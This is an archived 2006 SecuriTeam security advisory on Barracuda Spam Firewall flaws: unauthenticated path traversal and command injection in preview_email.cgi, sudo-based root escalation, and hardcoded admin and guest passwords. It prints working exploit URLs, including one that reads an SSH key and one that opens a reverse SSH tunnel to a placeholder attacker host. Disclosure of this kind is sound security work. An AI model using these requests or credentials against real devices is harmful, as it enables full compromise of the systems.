Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Barracuda Spam Firewall Administrator Level Command Execution

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Barracuda Spam Firewall Administrator Level Command Execution
Date: 6 Aug 2006 17:15:28 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Barracuda Spam Firewall Administrator Level Command Execution
------------------------------------------------------------------------


SUMMARY

Lack of input sanitisation in the Linux based Barracuda spam firewall web 
interface allows execution of commands by unauthenticated users. Combined 
with priviledge elevation techniques, execution of commands as the root 
user is possible allowing a full system compromise.

DETAILS

In a follow-up investigation to ' 
<http://www.securiteam.com/securitynews/5GP040KJFU.html> Barracuda 
Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]' by Greg 
Sinclair, further investigation was performed by the Internet Defence 
Security Team and several extra vulnerabilities were discovered, which 
when leveraged with privilege escalation techniques allowed the remote 
execution of commands as the root user without any authentication.

The original discovery by Greg Sinclair showed that it was possible to 
open arbitrary files, either owned by the user/group 'nobody:nogroup' or 
with world-read access, through the web interface using a path sanitation 
vulnerability in preview_email.cgi, e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi? 
file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp

Access to the path '/cgi-bin/preview_email.cgi' does not require any 
authentication.

Using this vulnerability, it is also possible to use the pipe character 
(|) to redirect the stdout of any programs run, to the stdin of the file 
open function to print the output of the command back to the web 
interface, e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi? 
file=/mail/mlog/../../bin/ls%20-la%20/|

It was then possible to leverage further privileges, as the user the http 
daemon runs as (nobody), is granted root level access to several system 
commands via the use of sudo, e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi? 
file=/mail/mlog/../../usr/bin/sudo%20touch%20/foo|

(Repeating the previous command should then show that the file 'foo' has 
been created with root permissions in '/').

The commands allowed (this is not a canonical list) include: mkdir, mv, 
cp, kill, ls, ln, chown, chmod, rm, echo, cat (as well as access to 
several 'wrapper' scripts in /home/emailswitch/code/firmware/current/bin/)

Access to such commands as a chown and chmod allowed further privilege 
escalation by setting the 'suid' bit on several other system programs, 
which could then be executed through the webinterface, without the use of 
sudo, and would run with root privileges.

As such, a complete system compromise is possible remotely through the web 
interface without any authentication.

It was also noted in ' 
<http://www.securiteam.com/securitynews/5HP050KJFY.html> Barracuda 
Vulnerability: Hardcoded Password [NNL-20060801-01]' a hardcoded 'guest' 
user password existed, which was 'bnadmin99'.

During further investigation it was noted that there was also a hard-coded 
'admin' user password (this is the admin user for the web interface), 
which is only possible to use if the httpd environment variable 
'REMOTE_ADDR' equals '127.0.0.1'. If this case is true, then it is 
possible to login to the web interface as the admin user using the 
password 'adminbn99'.

In order to gain elevated privileges to login to the web interface as the 
admin user, it is possible to bind a reverse ssh shell which would 
eventually satisfy the 'remote_addr == localhost' check.

It was possible to expose the ssh rsa public key, which then could be 
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi? 
file=/mail/mlog/../../bin/cat%20/home/emailswitch/code/config/id_rsa.pub|

With the public key in the authorized_keys2 file, it was then possible to 
initiate the reverse shell from the web interface, e.g:
https://<deviceip>/cgi-bin/preview_email.cgi? 
file=/mail/mlog/../../usr/bin/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa
 -R 8080:localhost:443 <youruser>@<youripaddress>|

It was them possible to login to 'https://127.0.0.1:8080/' with the 
username of 'admin' and password of 'adminbn99' and manage the device as 
an administrator.

It was noted that the original file input sanitation vulnerability seems 
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT 
03/08/06), which mitigates the attacks above.

So far, no advisories or update notices can be found on their website, and 
the version numbers of the affected software remains the same.

Recommendations:
We agree with Greg Sinclair's statement that the web interface should 
never be made accessible from untrusted networks like the Internet. The 
web interface on the Barracuda Spam Firewall has a history of similar 
issues, so we believe that it is highly likely that more vulnerabilities 
will be found in the future.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:matt@ecsc.co.uk> Matthew 
Hall.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Barracuda Spam Firewall Administrator Level Command Execution, SecuriTeam <=
Previous by Date:  [UNIX] phpAutoMembersArea File Inclusion, SecuriTeam
Next by Date:  [EXPL] myBlogger trackback SQL Injection, SecuriTeam
Previous by Thread:  [UNIX] phpAutoMembersArea File Inclusion, SecuriTeam
Next by Thread:  [EXPL] myBlogger trackback SQL Injection, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]